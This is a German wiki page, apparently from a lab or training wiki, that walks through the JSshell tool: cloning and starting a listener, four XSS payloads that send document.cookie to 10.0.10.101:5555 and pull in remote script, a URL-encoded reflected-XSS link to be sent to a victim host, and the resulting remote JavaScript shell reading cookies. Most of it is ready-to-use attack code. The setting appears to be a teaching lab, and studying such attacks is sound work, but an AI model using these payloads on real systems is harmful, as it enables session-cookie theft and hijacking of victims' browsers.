Jsshell: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 27: | Zeile 27: | ||
=Die Shell= | =Die Shell= | ||
Listening on [any] 5555 for incoming JS shell ... | Listening on [any] 5555 for incoming JS shell ... | ||
| − | Got JS shell from [10. | + | Got JS shell from [10.0.10.101] port 53146 to orville 5555 |
>>> var test = 'hacked by xinux' | >>> var test = 'hacked by xinux' | ||
>>> confirm(test) | >>> confirm(test) | ||
Version vom 9. März 2023, 16:04 Uhr
git clone
- git clone https://github.com/shelld3v/JSshell/
- cd JSshell/
- chmod +x jsh.py
start
- ./jsh.py -g -p 5555 -s 10.0.10.101
__
|(_ _ |_ _ | |
\_|__)_> | |(/_ | |
v3.1
Payloads:
- SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)>
- SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)</script>
- IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie},1010)>
- BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.0.10.101:5555/?"+document.cookie}></body>
Listening on [any] 5555 for incoming JS shell ...
Payload
- Payload muss ins Eingabefeld
Generierter Link
- http://opfer.secure.local/scripts/xss-reflected.php?name=%3Cscript%3EsetInterval%28function%28%29%7Bwith%28document%29body.appendChild%28createElement%28%22script%22%29%29.src%3D%22%2F%2F10.0.10.101%3A5555%2F%3F%22%2Bdocument.cookie%7D%2C1010%29%3C%2Fscript%3E#
- Generierter Link wird zum Opfer geschickt
Die Shell
Listening on [any] 5555 for incoming JS shell ... Got JS shell from [10.0.10.101] port 53146 to orville 5555 >>> var test = 'hacked by xinux' >>> confirm(test) >>> prompt(document.cookie)
Auf dem Client
